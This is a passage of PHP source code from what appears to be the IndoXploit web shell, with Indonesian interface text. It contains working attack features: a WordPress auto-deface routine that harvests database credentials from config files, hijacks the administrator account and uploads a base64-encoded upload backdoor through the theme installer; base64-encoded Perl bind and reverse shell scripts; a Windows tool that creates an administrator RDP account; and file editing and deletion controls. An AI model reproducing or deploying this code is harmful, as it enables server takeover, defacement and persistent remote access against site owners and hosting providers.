  1385. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1386. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1387. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1388. curl_setopt($ch, CURLOPT_POST, 1);
  1389. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1390. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1391. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1392. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1393. $data = curl_exec($ch);
  1394. curl_close($ch);
  1395. return $data;
  1396. }
  1397. $scan = $_POST['link_config'];
  1398. $link_config = scandir($scan);
  1399. $script = htmlspecialchars($_POST['script']);
  1400. $user = "indoxploit";
  1401. $pass = "indoxploit";
  1402. $passx = md5($pass);
  1403. foreach($link_config as $dir_config) {
  1404. if(!is_file("$scan/$dir_config")) continue;
  1405. $config = file_get_contents("$scan/$dir_config");
  1406. if(preg_match("/WordPress/", $config)) {
  1407. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1408. $dbuser = ambilkata($config,"DB_USER', '","'");
  1409. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1410. $dbname = ambilkata($config,"DB_NAME', '","'");
  1411. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1412. $prefix = $dbprefix."users";
  1413. $option = $dbprefix."options";
  1414. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1415. $db = mysql_select_db($dbname);
  1416. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1417. $result = mysql_fetch_array($q);
  1418. $id = $result[ID];
  1419. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1420. $result2 = mysql_fetch_array($q2);
  1421. $target = $result2[option_value];
  1422. if($target == '') {
  1423. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1424. } else {
  1425. echo "[+] $target <br>";
  1426. }
  1427. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1428. if(!$conn OR !$db OR !$update) {
  1429. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1430. mysql_close($conn);
  1431. } else {
  1432. $site = "$target/wp-login.php";
  1433. $site2 = "$target/wp-admin/theme-install.php?upload";
  1434. $b1 = anucurl($site2);
  1435. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1436. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1437. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1438. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1439. $www = "m.php";
  1440. $fp5 = fopen($www,"w");
  1441. fputs($fp5,$upload3);
  1442. $post2 = array(
  1443. "_wpnonce" => "$anu2",
  1444. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1445. "themezip" => "@$www",
  1446. "install-theme-submit" => "Install Now",
  1447. );
  1448. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1449. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1450. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1451. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1452. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1453. curl_setopt($ch, CURLOPT_POST, 1);
  1454. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1455. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1456. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1457. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1458. $data3 = curl_exec($ch);
  1459. curl_close($ch);
  1460. $y = date("Y");
  1461. $m = date("m");
  1462. $namafile = "id.php";
  1463. $fpi = fopen($namafile,"w");
  1464. fputs($fpi,$script);
  1465. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1466. curl_setopt($ch6, CURLOPT_POST, true);
  1467. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1468. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1469. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1470. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1471. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  1472. $postResult = curl_exec($ch6);
  1473. curl_close($ch6);
  1474. $as = "$target/k.php";
  1475. $bs = anucurl($as);
  1476. if(preg_match("#$script#is", $bs)) {
  1477. echo "[+] <font color='#18BC9C'>berhasil mepes...</font><br>";
  1478. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1479. } else {
  1480. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1481. echo "[!!] coba aja manual: <br>";
  1482. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1483. echo "[+] username: <font color=#18BC9C>$user</font><br>";
  1484. echo "[+] password: <font color=#18BC9C>$pass</font><br><br>";
  1485. }
  1486. mysql_close($conn);
  1487. }
  1488. }
  1489. }
  1490. } else {
  1491. echo "<center><h1>WordPress Auto Deface</h1>
  1492. <form method='post'>
  1493. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  1494. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
  1495. <input type='submit' class='btn btn-success btn-sm' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1496. </form>
  1497. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  1498. </center>";
  1499. }
  1500. } elseif($_GET['do'] == 'auto_dwp2') {
  1501. if($_POST['auto_deface_wp']) {
  1502. function anucurl($sites) {
  1503. $ch = curl_init($sites);
  1504. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1505. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1506. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1507. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1508. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1509. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1510. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1511. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1512. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1513. $data = curl_exec($ch);
  1514. curl_close($ch);
  1515. return $data;
  1516. }
  1517. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1518. $post = array(
  1519. "log" => "$userr",
  1520. "pwd" => "$pass",
  1521. "rememberme" => "forever",
  1522. "wp-submit" => "$wp_submit",
  1523. "redirect_to" => "$web",
  1524. "testcookie" => "1",
  1525. );
  1526. $ch = curl_init($cek);
  1527. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1528. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1529. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1530. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1531. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1532. curl_setopt($ch, CURLOPT_POST, 1);
  1533. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1534. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1535. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1536. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1537. $data = curl_exec($ch);
  1538. curl_close($ch);
  1539. return $data;
  1540. }
  1541. $link = explode("\r\n", $_POST['link']);
  1542. $script = htmlspecialchars($_POST['script']);
  1543. $user = "indoxploit";
  1544. $pass = "indoxploit";
  1545. $passx = md5($pass);
  1546. foreach($link as $dir_config) {
  1547. $config = anucurl($dir_config);
  1548. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1549. $dbuser = ambilkata($config,"DB_USER', '","'");
  1550. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1551. $dbname = ambilkata($config,"DB_NAME', '","'");
  1552. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1553. $prefix = $dbprefix."users";
  1554. $option = $dbprefix."options";
  1555. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1556. $db = mysql_select_db($dbname);
  1557. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1558. $result = mysql_fetch_array($q);
  1559. $id = $result[ID];
  1560. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1561. $result2 = mysql_fetch_array($q2);
  1562. $target = $result2[option_value];
  1563. if($target == '') {
  1564. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1565. } else {
  1566. echo "[+] $target <br>";
  1567. }
  1568. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1569. if(!$conn OR !$db OR !$update) {
  1570. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1571. mysql_close($conn);
  1572. } else {
  1573. $site = "$target/wp-login.php";
  1574. $site2 = "$target/wp-admin/theme-install.php?upload";
  1575. $b1 = anucurl($site2);
  1576. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1577. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1578. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1579. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1580. $www = "m.php";
  1581. $fp5 = fopen($www,"w");
  1582. fputs($fp5,$upload3);
  1583. $post2 = array(
  1584. "_wpnonce" => "$anu2",
  1585. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1586. "themezip" => "@$www",
  1587. "install-theme-submit" => "Install Now",
  1588. );
  1589. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1590. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1591. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1592. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1593. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1594. curl_setopt($ch, CURLOPT_POST, 1);
  1595. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1596. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1597. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1598. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1599. $data3 = curl_exec($ch);
  1600. curl_close($ch);
  1601. $y = date("Y");
  1602. $m = date("m");
  1603. $namafile = "id.php";
  1604. $fpi = fopen($namafile,"w");
  1605. fputs($fpi,$script);
  1606. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1607. curl_setopt($ch6, CURLOPT_POST, true);
  1608. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1609. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1610. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1611. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1612. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  1613. $postResult = curl_exec($ch6);
  1614. curl_close($ch6);
  1615. $as = "$target/k.php";
  1616. $bs = anucurl($as);
  1617. if(preg_match("#$script#is", $bs)) {
  1618. echo "[+] <font color='#18BC9C'>berhasil mepes...</font><br>";
  1619. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1620. } else {
  1621. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1622. echo "[!!] coba aja manual: <br>";
  1623. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1624. echo "[+] username: <font color=#18BC9C>$user</font><br>";
  1625. echo "[+] password: <font color=#18BC9C>$pass</font><br><br>";
  1626. }
  1627. mysql_close($conn);
  1628. }
  1629. }
  1630. } else {
  1631. echo "<center><h1>WordPress Auto Deface V.2</h1>
  1632. <form method='post'>
  1633. Link Config: <br>
  1634. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  1635. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
  1636. <input type='submit' class='btn btn-success btn-sm' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1637. </form></center>";
  1638. }
  1639. } elseif($_GET['do'] == 'network') {
  1640. echo "<form method='post'>
  1641. <u>Bind Port:</u> <br>
  1642. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  1643. <input type='submit' class='btn btn-success btn-sm' name='sub_bp' value='>>'>
  1644. </form>
  1645. <form method='post'>
  1646. <u>Back Connect:</u> <br>
  1647. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  1648. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  1649. <input type='submit' class='btn btn-success btn-sm' name='sub_bc' value='>>'>
  1650. </form>";
  1651. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1652. if(isset($_POST['sub_bp'])) {
  1653. $f_bp = fopen("/tmp/bp.pl", "w");
  1654. fwrite($f_bp, base64_decode($bind_port_p));
  1655. fclose($f_bp);
  1656.  
  1657. $port = $_POST['port_bind'];
  1658. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  1659. sleep(1);
  1660. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  1661. unlink("/tmp/bp.pl");
  1662. }
  1663. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  1664. if(isset($_POST['sub_bc'])) {
  1665. $f_bc = fopen("/tmp/bc.pl", "w");
  1666. fwrite($f_bc, base64_decode($bind_connect_p));
  1667. fclose($f_bc);
  1668.  
  1669. $ipbc = $_POST['ip_bc'];
  1670. $port = $_POST['port_bc'];
  1671. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  1672. sleep(1);
  1673. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  1674. unlink("/tmp/bc.pl");
  1675. }
  1676. } elseif($_GET['do'] == 'krdp_shell') {
  1677. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1678. if($_POST['create']) {
  1679. $user = htmlspecialchars($_POST['user']);
  1680. $pass = htmlspecialchars($_POST['pass']);
  1681. if(preg_match("/$user/", exe("net user"))) {
  1682. echo "[INFO] -> <font color=red>user <font color=#18BC9C>$user</font> sudah ada</font>";
  1683. } else {
  1684. $add_user = exe("net user $user $pass /add");
  1685. $add_groups1 = exe("net localgroup Administrators $user /add");
  1686. $add_groups2 = exe("net localgroup Administrator $user /add");
  1687. $add_groups3 = exe("net localgroup Administrateur $user /add");
  1688. echo "[ RDP ACCOUNT INFO<br>
  1689. ------------------------------<br>
  1690. IP: <font color=#18BC9C>".$ip."</font><br>
  1691. Username: <font color=#18BC9C>$user</font><br>
  1692. Password: <font color=#18BC9C>$pass</font><br>
  1693. ------------------------------<br><br>
  1694. [ STATUS<br>
  1695. ------------------------------<br>
  1696. ";
  1697. if($add_user) {
  1698. echo "[add user] -> <font color='#18BC9C'>Berhasil</font><br>";
  1699. } else {
  1700. echo "[add user] -> <font color='red'>Gagal</font><br>";
  1701. }
  1702. if($add_groups1) {
  1703. echo "[add localgroup Administrators] -> <font color='#18BC9C'>Berhasil</font><br>";
  1704. } elseif($add_groups2) {
  1705. echo "[add localgroup Administrator] -> <font color='#18BC9C'>Berhasil</font><br>";
  1706. } elseif($add_groups3) {
  1707. echo "[add localgroup Administrateur] -> <font color='#18BC9C'>Berhasil</font><br>";
  1708. } else {
  1709. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  1710. }
  1711. echo "------------------------------<br>";
  1712. }
  1713. } elseif($_POST['s_opsi']) {
  1714. $user = htmlspecialchars($_POST['r_user']);
  1715. if($_POST['opsi'] == '1') {
  1716. $cek = exe("net user $user");
  1717. echo "Checking username <font color=#18BC9C>$user</font> ....... ";
  1718. if(preg_match("/$user/", $cek)) {
  1719. echo "[ <font color=#18BC9C>Sudah ada</font><br>
  1720. ------------------------------<br><br>
  1721. <pre>$cek</pre>";
  1722. } else {
  1723. echo "[ <font color=red>belum ada</font>";
  1724. }
  1725. } elseif($_POST['opsi'] == '2') {
  1726. $cek = exe("net user $user indoxploit");
  1727. if(preg_match("/$user/", exe("net user"))) {
  1728. echo "[change password: <font color=#18BC9C>indoxploit</font>] -> ";
  1729. if($cek) {
  1730. echo "<font color=#18BC9C>Berhasil</font>";
  1731. } else {
  1732. echo "<font color=red>Gagal</font>";
  1733. }
  1734. } else {
  1735. echo "[INFO] -> <font color=red>user <font color=#18BC9C>$user</font> belum ada</font>";
  1736. }
  1737. } elseif($_POST['opsi'] == '3') {
  1738. $cek = exe("net user $user /DELETE");
  1739. if(preg_match("/$user/", exe("net user"))) {
  1740. echo "[remove user: <font color=#18BC9C>$user</font>] -> ";
  1741. if($cek) {
  1742. echo "<font color=#18BC9C>Berhasil</font>";
  1743. } else {
  1744. echo "<font color=red>Gagal</font>";
  1745. }
  1746. } else {
  1747. echo "[INFO] -> <font color=red>user <font color=#18BC9C>$user</font> belum ada</font>";
  1748. }
  1749. } else {
  1750. //
  1751. }
  1752. } else {
  1753. echo "-- Create RDP --<br>
  1754. <form method='post'>
  1755. <input type='text' name='user' placeholder='username' value='indoxploit' required>
  1756. <input type='text' name='pass' placeholder='password' value='indoxploit' required>
  1757. <input type='submit' class='btn btn-success btn-sm' name='create' value='>>'>
  1758. </form>
  1759. -- Option --<br>
  1760. <form method='post'>
  1761. <input type='text' name='r_user' placeholder='username' required>
  1762. <select name='opsi'>
  1763. <option value='1'>Cek Username</option>
  1764. <option value='2'>Ubah Password</option>
  1765. <option value='3'>Hapus Username</option>
  1766. </select>
  1767. <input type='submit' class='btn btn-success btn-sm'name='s_opsi' value='>>'>
  1768. </form>
  1769. ";
  1770. }
  1771. } else {
  1772. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  1773. }
  1774. } elseif($_GET['act'] == 'newfile') {
  1775. if($_POST['new_save_file']) {
  1776. $newfile = htmlspecialchars($_POST['newfile']);
  1777. $fopen = fopen($newfile, "a+");
  1778. if($fopen) {
  1779. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1780. } else {
  1781. $act = "<font color=red>permission denied</font>";
  1782. }
  1783. }
  1784. echo $act;
  1785. echo "<form method='post'>
  1786. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  1787. <input type='submit' name='new_save_file' value='Submit'>
  1788. </form>";
  1789. } elseif($_GET['act'] == 'newfolder') {
  1790. if($_POST['new_save_folder']) {
  1791. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1792. if(!mkdir($new_folder)) {
  1793. $act = "<font color=red>permission denied</font>";
  1794. } else {
  1795. $act = "<script>window.location='?dir=".$dir."';</script>";
  1796. }
  1797. }
  1798. echo $act;
  1799. echo "<form method='post'>
  1800. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1801. <input type='submit' name='new_save_folder' value='Submit'>
  1802. </form>";
  1803. } elseif($_GET['act'] == 'rename_dir') {
  1804. if($_POST['dir_rename']) {
  1805. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1806. if($dir_rename) {
  1807. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1808. } else {
  1809. $act = "<font color=red>permission denied</font>";
  1810. }
  1811. echo "".$act."<br>";
  1812. }
  1813. echo "<form method='post'>
  1814. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1815. <input type='submit' name='dir_rename' value='rename'>
  1816. </form>";
  1817. } elseif($_GET['act'] == 'delete_dir') {
  1818. if(is_dir($dir)) {
  1819. if(is_writable($dir)) {
  1820. @rmdir($dir);
  1821. @exe("rm -rf $dir");
  1822. @exe("rmdir /s /q $dir");
  1823. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1824. } else {
  1825. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1826. }
  1827. }
  1828. echo $act;
  1829. } elseif($_GET['act'] == 'view') {
  1830. echo "Filename: [ <font color=#18BC9C>".basename($_GET['file'])."</font> ] [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1831. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1832. } elseif($_GET['act'] == 'edit') {
  1833. if($_POST['save']) {
  1834. $save = file_put_contents($_GET['file'], $_POST['src']);
  1835. if($save) {
  1836. $act = "<font color=#18BC9C>Saved!</font>";
  1837. } else {
  1838. $act = "<font color=red>permission denied</font>";
  1839. }
  1840. echo "".$act."<br>";
  1841. }
  1842. echo "Filename: [ <font color=#18BC9C>".basename($_GET['file'])."</font> ] [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1843. echo "<form method='post'>
  1844. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1845. <input type='submit' class='btn btn-success btn-sm' value='Save' name='save' style='width: 500px;'>
  1846. </form>";
  1847. } elseif($_GET['act'] == 'rename') {
  1848. if($_POST['do_rename']) {
  1849. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1850. if($rename) {
  1851. $act = "<script>window.location='?dir=".$dir."';</script>";
  1852. } else {
  1853. $act = "<font color=red>permission denied</font>";
  1854. }
  1855. echo "".$act."<br>";
  1856. }
  1857. echo "Filename: [ <font color=#18BC9C>".basename($_GET['file'])."</font> ] [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a><br>";
  1858. echo "<form method='post'>
  1859. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  1860. <input type='submit' class='btn btn-success btn-sm' name='do_rename' value='rename'>
  1861. </form>";
  1862. } elseif($_GET['act'] == 'delete') {
  1863. $delete = unlink($_GET['file']);
  1864. if($delete) {
  1865. $act = "<script>window.location='?dir=".$dir."';</script>";
  1866. } else {
  1867. $act = "<font color=red>permission denied</font>";
  1868. }
  1869. echo $act;
  1870. } else {
  1871. if(is_dir($dir) === true) {
  1872. if(!is_readable($dir)) {
  1873. echo "<font color=red>can't open directory. ( not readable )</font>";
  1874. } else {
  1875. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1876. <tr>
  1877. <th class="th_home"><center>Name</center></th>
  1878. <th class="th_home"><center>Type</center></th>
  1879. <th class="th_home"><center>Size</center></th>
  1880. <th class="th_home"><center>Last Modified</center></th>
  1881. <th class="th_home"><center>Owner/Group</center></th>
  1882. <th class="th_home"><center>Permission</center></th>
  1883. <th class="th_home"><center>Action</center></th>
  1884. </tr>';
  1885. $scandir = scandir($dir);
  1886. foreach($scandir as $dirx) {
  1887. $dtype = filetype("$dir/$dirx");
  1888. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  1889. if(function_exists('posix_getpwuid')) {
  1890. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  1891. $downer = $downer['name'];
  1892. } else {
  1893. //$downer = $uid;
  1894. $downer = fileowner("$dir/$dirx");
  1895. }
  1896. if(function_exists('posix_getgrgid')) {
  1897. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  1898. $dgrp = $dgrp['name'];
  1899. } else {
  1900. $dgrp = filegroup("$dir/$dirx");
  1901. }
  1902. if(!is_dir("$dir/$dirx")) continue;
  1903. if($dirx === '..') {
  1904. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  1905. } elseif($dirx === '.') {
  1906. $href = "<a href='?dir=$dir'>$dirx</a>";
  1907. } else {
  1908. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  1909. }
  1910. if($dirx === '.' || $dirx === '..') {
  1911. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  1912. } else {
  1913. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  1914. }
  1915. echo "<tr class='td_home'> ";
